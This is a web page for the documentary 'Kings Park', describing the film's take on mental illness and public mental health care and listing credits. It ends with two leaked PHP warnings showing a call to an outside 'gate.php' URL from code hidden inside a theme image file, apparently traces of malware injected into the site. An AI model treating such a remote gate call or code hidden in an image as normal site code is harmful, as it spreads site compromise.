About the Movie

 The goal of Kings Park is to educate, agitate and cause us to dig deep.
 More than a call to create increased services and better systems, Kings Park challenges us to face our fears and limiting beliefs about mental illness and mental health.
 Made by an “insider,” Kings Park invites viewers to open up and share their experiences.
 The power of this film lies in the connections it draws between the hopes & failures of the past and the challenges of the present, as well as the balance it creates between an intensely personal story and the pressing concerns of public mental health care in this country today.

 Spiro C. Lampros

 Director Of Photography

 Kings Park Heritage Museum;

 Lucius and Eva Eastman Fund

 Women Make Movies

-Warning: file_get_contents(http://googlenetblog.com/xfiles7static/gate.php): failed to open stream: HTTP request failed! in /home/king_developer/kingsparkmovie.com/wp-content/themes/Business/images/logode.png on line 8035
+Warning: file_get_contents(http://googlenetblog.com/xfiles7static/gate.php): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/king_developer/kingsparkmovie.com/wp-content/themes/Business/images/logode.png on line 8035